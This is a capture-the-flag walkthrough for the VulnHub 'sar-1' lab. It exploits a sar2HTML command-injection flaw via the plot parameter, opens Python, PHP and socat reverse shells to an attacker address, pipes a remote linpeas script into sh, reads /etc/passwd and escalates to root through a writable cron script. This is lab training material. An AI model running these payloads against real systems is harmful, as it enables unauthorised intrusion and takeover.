https://www.vulnhub.com/entry/sar-1,425/
Discover Targer Networks
sudo nmap -sn 192.168.122.1-255
sudo nmap -p- 192.168.122.207
Port 80
- run
dirb http://192.168.122.207
and foundhttp://192.168.122.207/phpinfo.php
- Visit
http://192.168.122.207/robots.txt
and foundhttp://192.168.122.207/sar2HTML/
sar2HTML
- Version 3.2.1 of sar2HTML is vulnerble to remote code execution using URL GET request https://www.exploit-db.com/exploits/47204
Reverse Shell
- we can add any command after
http://192.168.122.207/sar2HTML/index.php?plot=;
to run, we can try some options from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
Python
- we can check if python exist on the machine
http://192.168.122.207/sar2HTML/index.php?plot=;which python3
- then we can run
ncat -nvlp 4444
on the attacker’s machine, and go tohttp://192.168.122.207/sar2HTML/index.php?plot=;python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.122.101",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
, now we have a reversed shell
PHP
- get a copy of PHP reverse shell script to current directory
cp /usr/share/webshells/php/php-reverse-shell.php .
, change theip
andport
to attacker’s - start a simple HTTP server on attacker using Python 3
python -m http.server 8888
- download the PHP script on to the target machine by visiting
http://192.168.122.207/sar2HTML/index.php?plot=;wget http://192.168.122.101:8888/php-reverse-shell.php
or upload it - start a listening port on attacker using
ncat -nvlp 7777
, and visithttp://192.168.122.207/sar2HTML/php-reverse-shell.php
, now we have a reversed shell
Explore the target machine
- Get a better shell using Python:
python3 -c 'import pty;pty.spawn("/bin/bash")'
- seeing all the users on target machine by
cat /etc/passwd
, we see an actual user calledlove
- Try running LinPeas.sh :
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
- we found out there is a cronjob that runs every 5 minutes by
root
*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh
- if we
cat /var/www/html/finally.sh
,
#!/bin/sh
./write.sh
it’s a shell script that will run /var/www/html/write.sh
, and if we open write.sh
, it will be some random shell script that creates a file in /tmp
- If we
ls -l /var/www/html
too all the file permissions and ownerships, we can see thatfinally.sh
is owned byroot
so we can’t modify it right now, butwrite.sh
is owned bywww-data
, which is our current daemon user.
Privilege escalation
- Because from that cronjob, we know that
write.sh
will be executed byroot
every 5 minutes, we can just try to modify it and give us another reverse shell, and it will be asroot
. - we can’t just use
nano
orvi
in this junk shell, as userwww-data
doesn’t have a TTY - we can try
echo "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.122.101:4444" >> write.sh
to put reversed shell command in there. - Now open a listener on attacker’s machine, and just wait
Capture the flags
- now we are
root
, we can change our passwords, installopenssh-server
and start it, then we can SSH into the machine instead cat /home/love/Desktop/user.txt
to get user flagcat /root/root.txt
to get root flag